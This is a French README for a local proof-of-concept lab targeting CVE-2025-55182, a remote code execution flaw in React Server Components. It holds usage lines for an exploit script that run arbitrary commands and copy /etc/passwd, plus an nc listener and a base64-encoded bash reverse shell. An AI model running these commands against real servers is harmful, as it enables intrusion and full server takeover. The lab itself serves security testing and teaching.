Laboratoire PoC CVE-2025-55182 React2Shell
Un laboratoire complet pour démontrer et tester la vulnérabilité critique CVE-2025-55182 dans les composants serveur React.
Ce dépôt est destiné à :
N'utilisez pas cela contre des systèmes qui ne vous appartiennent pas ou pour lesquels vous n'avez pas d'autorisation explicite. L'accès non autorisé est illégal.
✅ Exécuter des commandes arbitraires sans authentification ✅ Lire les fichiers système ✅ Créer et modifier des fichiers ✅ Établir des connexions de shell inversé ✅ Prendre le contrôle complet du serveur
npm install --legacy-peer-deps
npm run dev
Le serveur démarrera sur http://localhost:3000
bash check-cve.sh
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"
# Terminal 1 - Écouteur
nc -lvnp 4444
# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"
├── app/ # Application Next.js vulnérable
├── exploit/ # Preuve de concept fonctionnelle
│ └── rce_final.py # Script d'exploit principal
├── check-cve.sh # Vérificateur de vulnérabilité automatisé
├── package.json # Dépendances vulnérables
└── README.md
La vulnérabilité réside dans la logique de désérialisation des payloads des composants serveur React. L'exploit exploite la pollution de prototype pour exécuter du code arbitraire via process.mainModule.require('child_process').execSync().
Ce code est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. Les utilisateurs sont responsables de s'assurer qu'ils disposent d'une autorisation appropriée avant de tester un système. L'accès non autorisé à des systèmes informatiques est illégal en vertu de lois telles que le Computer Fraud and Abuse Act (CFAA) et des législations similaires dans d'autres juridictions.
L'auteur décline toute responsabilité en cas d'utilisation abusive de ces informations.
Après avoir travaillé avec ce laboratoire, vous comprendrez :